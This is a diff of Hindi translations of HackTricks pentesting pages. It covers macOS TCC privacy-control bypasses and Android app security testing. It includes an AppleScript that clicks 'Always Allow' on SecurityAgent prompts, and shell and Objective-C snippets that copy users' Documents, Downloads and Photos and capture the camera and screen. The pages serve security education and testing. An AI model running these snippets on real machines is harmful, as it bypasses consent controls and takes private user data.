कई अवसरों पर फ़ाइलें संवेदनशील जानकारी जैसे ईमेल, फोन नंबर, संदेश... गैर-सुरक्षित स्थानों में संग्रहीत करेंगी (जो Apple में एक कमजोरियों के रूप में गिनती है)।
<figure><img src="../../../../../images/image (474).png" alt=""><figcaption></figcaption></figure>
## Synthetic Clicks
## सिंथेटिक क्लिक
यह अब काम नहीं करता, लेकिन यह [**अतीत में काम करता था**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)**:**
यह अब काम नहीं करता, लेकिन [**पहले काम करता था**](https://twitter.com/noarfromspace/status/639125916233416704/photo/1)**:**
<figure><img src="../../../../../images/image (29).png" alt=""><figcaption></figcaption></figure>
एक और तरीका [**CoreGraphics events**](https://objectivebythesea.org/v2/talks/OBTS_v2_Wardle.pdf) का उपयोग करना:
एक और तरीका [**CoreGraphics इवेंट्स**](https://objectivebythesea.org/v2/talks/OBTS_v2_Wardle.pdf) का उपयोग करना:
<figure><img src="../../../../../images/image (30).png" alt="" width="563"><figcaption></figcaption></figure>
## Reference
## संदर्भ
- [**https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8**](https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8)
- [**https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/**](https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/)

6
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.md
View File

@ -5,18 +5,18 @@
## Apple Scripts
यह एक स्क्रिप्टिंग भाषा है जो कार्य स्वचालन के लिए उपयोग की जाती है **दूरस्थ प्रक्रियाओं के साथ बातचीत करने**। यह **अन्य प्रक्रियाओं से कुछ क्रियाएँ करने के लिए पूछना** काफी आसान बनाता है। **Malware** इन सुविधाओं का दुरुपयोग कर सकता है ताकि अन्य प्रक्रियाओं द्वारा निर्यातित कार्यों का दुरुपयोग किया जा सके।\
उदाहरण के लिए, एक malware **ब्राउज़र में खोले गए पृष्ठों में मनमाना JS कोड इंजेक्ट कर सकता है**। या **कुछ अनुमति अनुरोधों पर स्वचालित रूप से क्लिक** कर सकता है;
उदाहरण के लिए, एक malware **ब्राउज़र खोले गए पृष्ठों में मनमाना JS कोड इंजेक्ट कर सकता है**। या **कुछ अनुमति अनुरोधों पर स्वचालित रूप से क्लिक** कर सकता है;
```applescript
tell window 1 of process "SecurityAgent"
click button "Always Allow" of group 1
end tell
```
यहाँ कुछ उदाहरण हैं: [https://github.com/abbeycode/AppleScripts](https://github.com/abbeycode/AppleScripts)\
AppleScripts का उपयोग करके मैलवेयर के बारे में अधिक जानकारी [**यहाँ**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/) प्राप्त करें
मैलवेयर के बारे में अधिक जानकारी पाने के लिए applescripts का उपयोग करते हुए [**यहाँ**](https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/) जाएँ
Apple scripts को आसानी से "**संकलित**" किया जा सकता है। इन संस्करणों को आसानी से "**डीकंपाइल**" किया जा सकता है `osadecompile` के साथ।
हालांकि, ये स्क्रिप्ट को **"केवल पढ़ने के लिए" निर्यात** भी किया जा सकता है ( "निर्यात..." विकल्प के माध्यम से):
हालांकि, ये स्क्रिप्ट को **"केवल पढ़ने के लिए" निर्यात** भी किया जा सकता है ( "Export..." विकल्प के माध्यम से):
<figure><img src="https://github.com/carlospolop/hacktricks/raw/master/images/image%20(556).png" alt=""><figcaption></figcaption></figure>
```

12
src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.md
View File

@ -58,7 +58,7 @@ cp -r "$HOME/Desktop" "/tmp/desktop"
{{#tabs}}
{{#tab name="ObjetiveC"}}
कॉपी करें `$HOME/Documents` को `/tmp/documents` में।
`$HOME/Documents` को `/tmp/documents`ें कॉपी करें।
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -93,7 +93,7 @@ fclose(stderr); // Close the file stream
{{#endtab}}
{{#tab name="Shell"}}
कॉपी करें `$HOME/`Documents को `/tmp/documents` में।
`$HOME/`Documents को `/tmp/documents`ें कॉपी करें।
```bash
cp -r "$HOME/Documents" "/tmp/documents"
```
@ -156,7 +156,7 @@ cp -r "$HOME/Downloads" "/tmp/downloads"
{{#tabs}}
{{#tab name="ObjetiveC"}}
कॉपी करें `$HOME/Pictures/Photos Library.photoslibrary` को `/tmp/photos` में
कॉपी करें `$HOME/Pictures/Photos Library.photoslibrary` को `/tmp/photos` पर
```objectivec
#include <syslog.h>
#include <stdio.h>
@ -415,7 +415,7 @@ fclose(stderr); // Close the file stream
{{#endtab}}
{{#tab name="Shell"}}
कैमरे से एक फोटो लें
कैमरे से फोटो लें
```bash
ffmpeg -framerate 30 -f avfoundation -i "0" -frames:v 1 /tmp/capture.jpg
```
@ -713,7 +713,7 @@ screencapture -V 5 /tmp/screen.mov
- **अधिकार**: कोई नहीं
- **TCC**: `kTCCServiceAccessibility`
Finder के नियंत्रण को स्वीकार करने के लिए TCC विशेषाधिकार का उपयोग करें, एंटर दबाकर और इस तरह TCC को बायपास करें
TCC विशेषाधिकार का उपयोग करें ताकि Finder के नियंत्रण को स्वीकार किया जा सके, एंटर दबाकर और इस तरह TCC को बायपास करें
{{#tabs}}
{{#tab name="TCC स्वीकार करें"}}
@ -877,6 +877,6 @@ return 0;
{{#endtab}}
{{#endtabs}}
> [!CAUTION] > **एक्सेसिबिलिटी एक बहुत शक्तिशाली अनुमति है**, आप इसे अन्य तरीकों से दुरुपयोग कर सकते हैं, उदाहरण के लिए आप **कीस्ट्रोक्स अटैक** केवल इससे कर सकते हैं बिना सिस्टम इवेंट्स को कॉल किए।
> [!CAUTION] > **एक्सेसिबिलिटी एक बहुत शक्तिशाली अनुमति है**, आप इसे अन्य तरीकों से दुरुपयोग कर सकते हैं, उदाहरण के लिए आप **कीस्ट्रोक्स हमले** को केवल इससे कर सकते हैं बिना सिस्टम इवेंट्स को कॉल किए।
{{#include ../../../../banners/hacktricks-training.md}}

192
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -12,10 +12,10 @@ android-applications-basics.md
## ADB (Android Debug Bridge)
यह मुख्य उपकरण है जिसकी आपको एक एंड्रॉइड डिवाइस (अनुकरणीय या भौतिक) से कनेक्ट करने की आवश्यकता है।\
**ADB** आपको **USB** या **Network** के माध्यम से कंप्यूटर से उपकरणों को नियंत्रित करने की अनुमति देता है। यह उपयोगिता **फाइलों** की दोनों दिशाओं में **कॉपीिंग**, **ऐप्स** की **स्थापना** और **अनइंस्टॉलेशन**, **शेल कमांड्स** का **निष्पादन**, **डेटा** का **बैकअप**, **लॉग्स** को **पढ़ने** जैसी अन्य कार्यों को सक्षम बनाती है।
यह मुख्य उपकरण है जिसकी आपको एक Android डिवाइस (अनुकरणीय या भौतिक) से कनेक्ट करने की आवश्यकता है।\
**ADB** आपको **USB** या **Network** के माध्यम से कंप्यूटर से उपकरणों को नियंत्रित करने की अनुमति देता है। यह उपयोगिता **फाइलों** की दोनों दिशाओं में **कॉपी**, **ऐप्स** की **स्थापना** और **अनइंस्टॉलेशन**, **शेल कमांड्स** का **निष्पादन**, **डेटा** का **बैकअप**, **लॉग्स** को **पढ़ने** जैसी अन्य कार्यों को सक्षम बनाती है।
ADB का उपयोग कैसे करें, यह जानने के लिए निम्नलिखित [**ADB Commands**](adb-commands.md) की सूची पर एक नज़र डालें।
ADB का उपयोग कैसे करें, यह जानने के लिए [**ADB Commands**](adb-commands.md) की निम्नलिखित सूची पर एक नज़र डालें।
## Smali
@ -47,7 +47,7 @@ java -jar uber-apk-signer.jar -a merged.apk --allowResign -o merged_signed
```
## Static Analysis
सबसे पहले, एक APK का विश्लेषण करने के लिए आपको **decompiler का उपयोग करके Java कोड पर नज़र डालनी चाहिए**।\
सबसे पहले, एक APK का विश्लेषण करने के लिए आपको **decompiler** का उपयोग करके **Java कोड** पर एक नज़र डालनी चाहिए।\
कृपया, [**विभिन्न उपलब्ध decompilers के बारे में जानकारी के लिए यहाँ पढ़ें**](apk-decompilers.md).
### Looking for interesting Info
@ -60,23 +60,23 @@ APK के **strings** पर एक नज़र डालकर आप **passw
### Basic understanding of the application - Manifest.xml, strings.xml
**एक एप्लिकेशन के \_Manifest.xml**_\*\* और \*\*_**strings.xml**\_\*\* फ़ाइलों की जांच संभावित सुरक्षा कमजोरियों को उजागर कर सकती है\*\* इन फ़ाइलों को decompilers का उपयोग करके या APK फ़ाइल एक्सटेंशन को .zip में बदलकर और फिर इसे अनज़िप करके एक्सेस किया जा सकता है।
**एक एप्लिकेशन के \_Manifest.xml**_\*\* और \*\*_**strings.xml**\_\*\* फ़ाइलों की जांच संभावित सुरक्षा कमजोरियों को उजागर कर सकती है\*\*. इन फ़ाइलों को decompilers का उपयोग करके या APK फ़ाइल एक्सटेंशन को .zip में बदलकर और फिर इसे अनज़िप करके एक्सेस किया जा सकता है।
**Manifest.xml** से पहचानी गई **Vulnerabilities** में शामिल हैं:
- **Debuggable Applications**: _Manifest.xml_ फ़ाइल में `debuggable="true"` के रूप में सेट की गई एप्लिकेशन जोखिम पैदा करती हैं क्योंकि वे ऐसे कनेक्शन की अनुमति देती हैं जो शोषण की ओर ले जा सकते हैं। डिबग करने योग्य एप्लिकेशन को खोजने और शोषण करने के तरीके पर एक ट्यूटोरियल के लिए संदर्भित करें
- **Debuggable Applications**: _Manifest.xml_ फ़ाइल में `debuggable="true"` के रूप में सेट की गई एप्लिकेशन जोखिम पैदा करती हैं क्योंकि वे ऐसे कनेक्शन की अनुमति देती हैं जो शोषण की ओर ले जा सकते हैं। डिबग करने योग्य एप्लिकेशन को शोषित करने के तरीके को समझने के लिए, एक ट्यूटोरियल देखें जिसमें डिवाइस पर डिबग करने योग्य एप्लिकेशन को खोजने और शोषित करने के बारे में बताया गया है
- **Backup Settings**: संवेदनशील जानकारी से निपटने वाले एप्लिकेशनों के लिए `android:allowBackup="false"` विशेष रूप से सेट किया जाना चाहिए ताकि adb के माध्यम से अनधिकृत डेटा बैकअप को रोका जा सके, विशेष रूप से जब usb debugging सक्षम हो।
- **Network Security**: _res/xml/_ में कस्टम नेटवर्क सुरक्षा कॉन्फ़िगरेशन (`android:networkSecurityConfig="@xml/network_security_config"`) सुरक्षा विवरण जैसे प्रमाणपत्र पिन और HTTP ट्रैफ़िक सेटिंग्स निर्दिष्ट कर सकते हैं। एक उदाहरण विशेष डोमेन के लिए HTTP ट्रैफ़िक की अनुमति देना है।
- **Exported Activities and Services**: मैनिफेस्ट में निर्यातित गतिविधियों और सेवाओं की पहचान करना उन घटकों को उजागर कर सकता है जो दुरुपयोग के लिए संवेदनशील हो सकते हैं। गतिशील परीक्षण के दौरान आगे के विश्लेषण से यह पता चल सकता है कि इन घटकों का शोषण कैसे किया जाए।
- **Network Security**: _res/xml/_ में कस्टम नेटवर्क सुरक्षा कॉन्फ़िगरेशन (`android:networkSecurityConfig="@xml/network_security_config"`) सुरक्षा विवरण जैसे प्रमाणपत्र पिन और HTTP ट्रैफ़िक सेटिंग्स को निर्दिष्ट कर सकते हैं। एक उदाहरण विशेष डोमेन के लिए HTTP ट्रैफ़िक की अनुमति देना है।
- **Exported Activities and Services**: मैनिफेस्ट में निर्यातित गतिविधियों और सेवाओं की पहचान करना उन घटकों को उजागर कर सकता है जिन्हें दुरुपयोग किया जा सकता है। गतिशील परीक्षण के दौरान आगे के विश्लेषण से यह पता चल सकता है कि इन घटकों का शोषण कैसे किया जाए।
- **Content Providers and FileProviders**: उजागर सामग्री प्रदाता अनधिकृत पहुंच या डेटा में संशोधन की अनुमति दे सकते हैं। FileProviders की कॉन्फ़िगरेशन की भी जांच की जानी चाहिए।
- **Broadcast Receivers and URL Schemes**: ये घटक शोषण के लिए उपयोग किए जा सकते हैं, विशेष रूप से इनपुट कमजोरियों के लिए URL योजनाओं के प्रबंधन पर ध्यान दिया जाना चाहिए।
- **Broadcast Receivers and URL Schemes**: ये घटक शोषण के लिए उपयोग किए जा सकते हैं, विशेष रूप से इनपुट कमजोरियों के लिए URL योजनाओं के प्रबंधन के तरीके पर ध्यान दिया जाना चाहिए।
- **SDK Versions**: `minSdkVersion`, `targetSDKVersion`, और `maxSdkVersion` विशेषताएँ समर्थित Android संस्करणों को इंगित करती हैं, सुरक्षा कारणों से पुराने, कमजोर Android संस्करणों का समर्थन न करने के महत्व को उजागर करती हैं।
**strings.xml** फ़ाइल से, संवेदनशील जानकारी जैसे API keys, कस्टम स्कीमा, और अन्य डेवलपर नोट्स खोजे जा सकते हैं, जो इन संसाधनों की सावधानीपूर्वक समीक्षा की आवश्यकता को उजागर करते हैं
**strings.xml** फ़ाइल से संवेदनशील जानकारी जैसे API keys, कस्टम स्कीमा, और अन्य डेवलपर नोट्स का पता लगाया जा सकता है, जो इन संसाधनों की सावधानीपूर्वक समीक्षा की आवश्यकता को उजागर करता है
### Tapjacking
**Tapjacking** एक हमला है जहां एक **malicious** **application** लॉन्च किया जाता है और **पीड़ित एप्लिकेशन के शीर्ष पर खुद को रखता है**। जब यह स्पष्ट रूप से पीड़ित ऐप को अस्पष्ट करता है, तो इसका उपयोगकर्ता इंटरफ़ेस इस तरह से डिज़ाइन किया गया है कि उपयोगकर्ता को इसके साथ बातचीत करने के लिए धोखा दिया जाए, जबकि यह बातचीत को पीड़ित ऐप को पास कर रहा है।\
**Tapjacking** एक हमला है जहां एक **malicious** **application** लॉन्च किया जाता है और **एक पीड़ित एप्लिकेशन के शीर्ष पर खुद को रखता है**। जब यह पीड़ित ऐप को दृश्यमान रूप से अस्पष्ट करता है, तो इसका उपयोगकर्ता इंटरफ़ेस इस तरह से डिज़ाइन किया गया है कि उपयोगकर्ता को इसके साथ बातचीत करने के लिए धोखा दिया जाए, जबकि यह बातचीत को पीड़ित ऐप के पास भेज रहा है।\
प्रभाव में, यह **उपयोगकर्ता को यह जानने से अंधा कर रहा है कि वे वास्तव में पीड़ित ऐप पर क्रियाएँ कर रहे हैं**
अधिक जानकारी प्राप्त करें:
@ -87,7 +87,7 @@ tapjacking.md
### Task Hijacking
एक **activity** जिसमें **`launchMode`** **`singleTask`** पर सेट है और कोई `taskAffinity` परिभाषित नहीं है, कार्य Hijacking के लिए संवेदनशील है। इसका मतलब है कि एक **application** स्थापित की जा सकती है और यदि इसे वास्तविक एप्लिकेशन से पहले लॉन्च किया जाता है, तो यह **वास्तविक एप्लिकेशन के कार्य को हाइजैक कर सकती है** (इसलिए उपयोगकर्ता **malicious application के साथ बातचीत कर रहा है यह सोचते हुए कि वह असली का उपयोग कर रहा है**).
एक **activity** जिसमें **`launchMode`** **`singleTask`** पर सेट है और कोई `taskAffinity` परिभाषित नहीं है, कार्य हाइजैकिंग के लिए संवेदनशील है। इसका मतलब है कि एक **application** स्थापित की जा सकती है और यदि इसे वास्तविक एप्लिकेशन से पहले लॉन्च किया जाता है, तो यह **वास्तविक एप्लिकेशन के कार्य को हाइजैक कर सकती है** (इसलिए उपयोगकर्ता **malicious application** के साथ बातचीत कर रहा होगा, सोचते हुए कि वह असली का उपयोग कर रहा है)।
अधिक जानकारी में:
@ -99,31 +99,31 @@ android-task-hijacking.md
**Internal Storage**
Android में, फ़ाइलें **internal** storage में **stored** होती हैं ताकि केवल **app** जो उन्हें **created** करती है, उन्हें **access** कर सके। यह सुरक्षा उपाय Android ऑपरेटिंग सिस्टम द्वारा **enforced** किया गया है और अधिकांश एप्लिकेशनों की सुरक्षा आवश्यकताओं के लिए सामान्यतः पर्याप्त है। हालाँकि, डेवलपर्स कभी-कभी `MODE_WORLD_READABLE` और `MODE_WORLD_WRITABLE` जैसे मोड का उपयोग करते हैं ताकि फ़ाइलों को विभिन्न एप्लिकेशनों के बीच **share** किया जा सके। फिर भी, ये मोड अन्य एप्लिकेशनों द्वारा इन फ़ाइलों तक पहुँच को **restrict** नहीं करते, जिसमें संभावित रूप से दुर्भावनापूर्ण एप्लिकेशन भी शामिल हैं।
Android में, फ़ाइलें **internal** storage में **stored** की जाती हैं ताकि वे केवल उस **app** द्वारा **accessible** हों जिसने उन्हें **created** किया है। यह सुरक्षा उपाय Android ऑपरेटिंग सिस्टम द्वारा **enforced** किया गया है और सामान्यतः अधिकांश एप्लिकेशनों की सुरक्षा आवश्यकताओं के लिए पर्याप्त है। हालाँकि, डेवलपर्स कभी-कभी `MODE_WORLD_READABLE` और `MODE_WORLD_WRITABLE` जैसे मोड का उपयोग करते हैं ताकि फ़ाइलों को विभिन्न एप्लिकेशनों के बीच **shared** किया जा सके। फिर भी, ये मोड अन्य एप्लिकेशनों द्वारा इन फ़ाइलों तक पहुँच को **restrict** नहीं करते हैं, जिसमें संभावित रूप से दुर्भावनापूर्ण एप्लिकेशन भी शामिल हैं।
1. **Static Analysis:**
- **Ensure** करें कि `MODE_WORLD_READABLE` और `MODE_WORLD_WRITABLE` का उपयोग **carefully scrutinized** किया गया है। ये मोड फ़ाइलों को **अनपेक्षित या अनधिकृत पहुंच** के लिए **potentially expose** कर सकते हैं।
- **Ensure** करें कि `MODE_WORLD_READABLE` और `MODE_WORLD_WRITABLE` का उपयोग **carefully scrutinized** किया गया है। ये मोड फ़ाइलों को **unintended या unauthorized access** के लिए **potentially expose** कर सकते हैं।
2. **Dynamic Analysis:**
- **Verify** करें कि ऐप द्वारा बनाई गई फ़ाइलों पर सेट की गई **permissions**्या हैं। विशेष रूप से, **check** करें कि क्या कोई फ़ाइलें **विश्व स्तर पर पढ़ने या लिखने के लिए सेट की गई हैं**। यह एक महत्वपूर्ण सुरक्षा जोखिम पैदा कर सकता है, क्योंकि यह **किसी भी एप्लिकेशन** को जो डिवाइस पर स्थापित है, उसकी उत्पत्ति या इरादे की परवाह किए बिना, इन फ़ाइलों को **पढ़ने या संशोधित** करने की अनुमति देगा।
- ऐप द्वारा बनाई गई फ़ाइलों पर सेट की गई **permissions****verify** करें। विशेष रूप से, **check** करें कि क्या कोई फ़ाइलें **विश्व स्तर पर पढ़ने या लिखने के लिए सेट की गई हैं**। यह एक महत्वपूर्ण सुरक्षा जोखिम पैदा कर सकता है, क्योंकि यह **किसी भी एप्लिकेशन** को जो डिवाइस पर स्थापित है, उसकी उत्पत्ति या इरादे की परवाह किए बिना, इन फ़ाइलों को **read या modify** करने की अनुमति देगा।
**External Storage**
**External storage** पर फ़ाइलों के साथ काम करते समय, कुछ सावधानियाँ बरतनी चाहिए:
**External storage** पर फ़ाइलों से निपटने के दौरान, कुछ सावधानियाँ बरतनी चाहिए:
1. **Accessibility**:
- बाहरी संग्रहण पर फ़ाइलें **globally readable and writable** होती हैं। इसका मतलब है कि कोई भी एप्लिकेशन या उपयोगकर्ता इन फ़ाइलों तक पहुँच सकता है।
- बाहरी संग्रहण पर फ़ाइलें **globally readable और writable** होती हैं। इसका मतलब है कि कोई भी एप्लिकेशन या उपयोगकर्ता इन फ़ाइलों तक पहुँच सकता है।
2. **Security Concerns**:
- पहुँच की आसानी को देखते हुए, सलाह दी जाती है कि **संवेदनशील जानकारी** को बाहरी संग्रहण पर **न रखें**
- पहुँच की आसानी को देखते हुए, **संवेदनशील जानकारी** को बाहरी संग्रहण पर **store** न करने की सलाह दी जाती है
- बाहरी संग्रहण को किसी भी एप्लिकेशन द्वारा हटाया या एक्सेस किया जा सकता है, जिससे यह कम सुरक्षित हो जाता है।
3. **Handling Data from External Storage**:
- हमेशा बाहरी संग्रहण से प्राप्त डेटा पर **input validation** करें। यह महत्वपूर्ण है क्योंकि डेटा एक अविश्वसनीय स्रोत से है।
- बाहरी संग्रहण पर executable या class फ़ाइलों को गतिशील लोडिंग के लिए रना दृढ़ता से हतोत्साहित किया जाता है।
- यदि आपके एप्लिकेशन को बाहरी संग्रहण से executable फ़ाइलें प्राप्त करनी हैं, तो सुनिश्चित करें कि ये फ़ाइलें **signed and cryptographically verified** हैं इससे पहले कि उन्हें गतिशील रूप से लोड किया जाए। यह आपके एप्लिकेशन की सुरक्षा अखंडता बनाए रखने के लिए महत्वपूर्ण है।
- बाहरी संग्रहण पर executable या class फ़ाइलों को गतिशील लोडिंग के लिए **store**रना दृढ़ता से हतोत्साहित किया जाता है।
- यदि आपके एप्लिकेशन को बाहरी संग्रहण से executable फ़ाइलें प्राप्त करनी हैं, तो सुनिश्चित करें कि ये फ़ाइलें **signed और cryptographically verified** हैं इससे पहले कि उन्हें गतिशील रूप से लोड किया जाए। यह आपके एप्लिकेशन की सुरक्षा अखंडता बनाए रखने के लिए महत्वपूर्ण है।
बाहरी संग्रहण को `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard` में **accessed** किया जा सकता है।
बाहरी संग्रहण को `/storage/emulated/0`, `/sdcard`, `/mnt/sdcard` में **access** किया जा सकता है।
> [!NOTE]
> Android 4.4 (**API 17**) से शुरू होकर, SD कार्ड में एक निर्देशिका संरचना है जो **किसी ऐप को उस ऐप के लिए विशेष रूप से निर्देशिका तक पहुँच को सीमित करती है**। यह दुर्भावनापूर्ण एप्लिकेशन को किसी अन्य ऐप की फ़ाइलों को पढ़ने या लिखने की अनुमति नहीं देता है।
> Android 4.4 (**API 17**) से शुरू होकर, SD कार्ड में एक निर्देशिका संरचना है जो **एक ऐप से उस ऐप के लिए विशेष रूप से निर्देशिका तक पहुँच को सीमित करती है**। यह दुर्भावनापूर्ण एप्लिकेशन को किसी अन्य ऐप की फ़ाइलों को पढ़ने या लिखने की अनुमति नहीं देता है।
**Sensitive data stored in clear-text**
@ -134,12 +134,12 @@ Android में, फ़ाइलें **internal** storage में **stored
**Accept All Certificates**
किसी कारण से कभी-कभी डेवलपर्स सभी प्रमाणपत्रों को स्वीकार करते हैं भले ही उदाहरण के लिए होस्टनाम कोड की पंक्तियों के साथ मेल न खाता हो जैसे कि निम्नलिखित:
किसी कारण से कभी-कभी डेवलपर्स सभी प्रमाणपत्रों को स्वीकार करते हैं, भले ही उदाहरण के लिए होस्टनाम कोड की निम्नलिखित पंक्तियों के साथ मेल न खाता हो:
```java
SSLSocketFactory sf = new cc(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
```
एक अच्छा तरीका यह परीक्षण करने का है कि कुछ प्रॉक्सी जैसे Burp का उपयोग करके ट्रैफ़िक को कैप्चर करने की कोशिश करें बिना डिवाइस के अंदर Burp CA को अधिकृत किए। इसके अलावा, आप Burp के साथ एक अलग होस्टनाम के लिए एक प्रमाणपत्र उत्पन्न कर सकते हैं और इसका उपयोग कर सकते हैं।
एक अच्छा तरीका यह परीक्षण करने का है कि आप किसी प्रॉक्सी जैसे Burp का उपयोग करके ट्रैफ़िक कैप्चर करने की कोशिश करें बिना डिवाइस के अंदर Burp CA को अधिकृत किए। इसके अलावा, आप Burp के साथ एक अलग होस्टनाम के लिए एक प्रमाणपत्र उत्पन्न कर सकते हैं और इसका उपयोग कर सकते हैं।
### टूटी हुई क्रिप्टोग्राफी
@ -149,19 +149,19 @@ sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
**असुरक्षित और/या अप्रचलित एल्गोरिदम का उपयोग**
डेवलपर्स को **अप्रचलित एल्गोरिदम** का उपयोग करके प्राधिकरण **जांच**, **डेटा सहेजने** या **भेजने** से बचना चाहिए। इनमें से कुछ एल्गोरिदम हैं: RC4, MD4, MD5, SHA1... यदि **हैश** का उपयोग पासवर्ड को सहेजने के लिए किया जाता है, तो हैश ब्रूट-फोर्स **प्रतिरोधी** होना चाहिए और इसे नमक के साथ उपयोग किया जाना चाहिए।
डेवलपर्स को **अप्रचलित एल्गोरिदम** का उपयोग करके प्राधिकरण **जांच**, **डेटा सहेजने** या **भेजने** से बचना चाहिए। इनमें से कुछ एल्गोरिदम हैं: RC4, MD4, MD5, SHA1... यदि **हैश** का उपयोग पासवर्ड को सहेजने के लिए किया जाता है, तो हैश ब्रूट-फोर्स **प्रतिरोधी** होना चाहिए और नमक के साथ होना चाहिए।
### अन्य जांचें
- यह अनुशंसा की जाती है कि **APK को ओबफस्केट** किया जाए ताकि हमलावरों के लिए रिवर्स इंजीनियरिंग का कार्य कठिन हो सके।
- यदि ऐप संवेदनशील है (जैसे बैंक ऐप), तो इसे **जांच करनी चाहिए कि मोबाइल रूटेड है** और इसके अनुसार कार्य करना चाहिए।
- यदि ऐप संवेदनशील है (जैसे बैंक ऐप), तो इसे जांच करनी चाहिए कि क्या एक **इम्यूलेटर** का उपयोग किया जा रहा है।
- यदि ऐप संवेदनशील है (जैसे बैंक ऐप), तो इसे जांच करनी चाहिए कि क्या **इम्यूलेटर** का उपयोग किया जा रहा है।
- यदि ऐप संवेदनशील है (जैसे बैंक ऐप), तो इसे **कार्यक्रम को निष्पादित करने से पहले अपनी अखंडता की जांच करनी चाहिए** कि क्या इसे संशोधित किया गया है।
- [**APKiD**](https://github.com/rednaga/APKiD) का उपयोग करें यह जांचने के लिए कि APK बनाने के लिए कौन सा कंपाइलर/पैकर/ओबफस्केटर का उपयोग किया गया था।
### रिएक्ट नेटिव एप्लिकेशन
रिएक्ट एप्लिकेशनों के जावास्क्रिप्ट कोड तक आसानी से पहुँचने के लिए निम्नलिखित पृष्ठ को पढ़ें:
रिएक्ट एप्लिकेशनों के जावास्क्रिप्ट कोड तक आसानी से पहुँचने के लिए निम्नलिखित पृष्ठ पढ़ें:
{{#ref}}
react-native-application.md
@ -169,7 +169,7 @@ react-native-application.md
### ज़ामरिन एप्लिकेशन
ज़ामरिन एप्लिकेशनों के C# कोड तक आसानी से पहुँचने के लिए निम्नलिखित पृष्ठ को पढ़ें:
ज़ामरिन एप्लिकेशनों के C# कोड तक आसानी से पहुँचने के लिए निम्नलिखित पृष्ठ पढ़ें:
{{#ref}}
../xamarin-apps.md
@ -177,11 +177,11 @@ react-native-application.md
### सुपरपैक्ड एप्लिकेशन
इस [**ब्लॉग पोस्ट**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) के अनुसार सुपरपैक्ड एक मेटा एल्गोरिदम है जो एक एप्लिकेशन की सामग्री को एकल फ़ाइल में संकुचित करता है। ब्लॉग इस संभावना के बारे में बात करता है कि एक ऐप बनाया जा सकता है जो इन प्रकार के ऐप्स को अनसंकुचित करता है... और एक तेज़ तरीका जो **एप्लिकेशन को निष्पादित करने और फ़ाइल सिस्टम से अनसंकुचित फ़ाइलों को इकट्ठा करने** में शामिल है।
इस [**ब्लॉग पोस्ट**](https://clearbluejar.github.io/posts/desuperpacking-meta-superpacked-apks-with-github-actions/) के अनुसार सुपरपैक्ड एक मेटा एल्गोरिदम है जो एक एप्लिकेशन की सामग्री को एकल फ़ाइल में संकुचित करता है। ब्लॉग इस संभावना के बारे में बात करता है कि एक ऐप बनाया जा सकता है जो इन प्रकार के ऐप्स को अनसंकुचित करता है... और एक तेज़ तरीका जो एप्लिकेशन को **निष्पादित करने और फ़ाइल सिस्टम से अनसंकुचित फ़ाइलों को इकट्ठा करने** में शामिल है।
### स्वचालित स्थैतिक कोड विश्लेषण
उपकरण [**mariana-trench**](https://github.com/facebook/mariana-trench) **एप्लिकेशन के कोड को स्कैन करके** **कमजोरियों** को खोजने में सक्षम है। इस उपकरण में **ज्ञात स्रोतों** की एक श्रृंखला होती है (जो उपकरण को **उन स्थानों** को इंगित करती है जहाँ **इनपुट** **उपयोगकर्ता द्वारा नियंत्रित**ोता है), **सिंक** (जो उपकरण को **खतरनाक** **स्थान** इंगित करता है जहाँ दुर्भावनापूर्ण उपयोगकर्ता इनपुट नुकसान पहुंचा सकता है) और **नियम**। ये नियम **स्रोत-सिंक** के **संयोग** को इंगित करते हैं जो एक कमजोरी को इंगित करते हैं।
उपकरण [**mariana-trench**](https://github.com/facebook/mariana-trench) **कोड** के **स्कैनिंग** द्वारा **कमजोरियों** को खोजने में सक्षम है। यह उपकरण **ज्ञात स्रोतों** की एक श्रृंखला को शामिल करता है (जो उपकरण को **जगहें** बताता है जहाँ **इनपुट** **उपयोगकर्ता द्वारा नियंत्रित** है), **सिंक** (जो उपकरण को **खतरनाक** **जगहें** बताता है जहाँ दुर्भावनापूर्ण उपयोगकर्ता इनपुट नुकसान पहुंचा सकता है) और **नियम**। ये नियम **स्रोत-सिंक** के **संयोग** को इंगित करते हैं जो एक कमजोरी को इंगित करते हैं।
इस ज्ञान के साथ, **mariana-trench कोड की समीक्षा करेगा और इसमें संभावित कमजोरियों को खोजेगा**
@ -199,8 +199,8 @@ bypass-biometric-authentication-android.md
- **कोड निष्पादन**: `Runtime.exec(), ProcessBuilder(), native code:system()`
- **SMS भेजें**: `sendTextMessage, sendMultipartTestMessage`
- **स्थानीय कार्य** घोषित किए गए हैं `native`: `public native, System.loadLibrary, System.load`
- [यह पढ़ें कि **स्थानीय कार्यों को कैसे रिवर्स करें**](reversing-native-libraries.md)
- **घरेलू कार्य** घोषित किए गए हैं `native`: `public native, System.loadLibrary, System.load`
- [यह पढ़ें **कैसे रिवर्स करें घरेलू कार्य**](reversing-native-libraries.md)
### **अन्य तरकीबें**
@ -214,7 +214,7 @@ content-protocol.md
## गतिशील विश्लेषण
> सबसे पहले, आपको एक ऐसा वातावरण चाहिए जहाँ आप एप्लिकेशन और सभी वातावरण (मुख्य रूप से Burp CA प्रमाणपत्र, Drozer और Frida) स्थापित कर सकें। इसलिए, एक रूटेड डिवाइस (इम्यूलेटेड या नहीं) अत्यधिक अनुशंसित है।
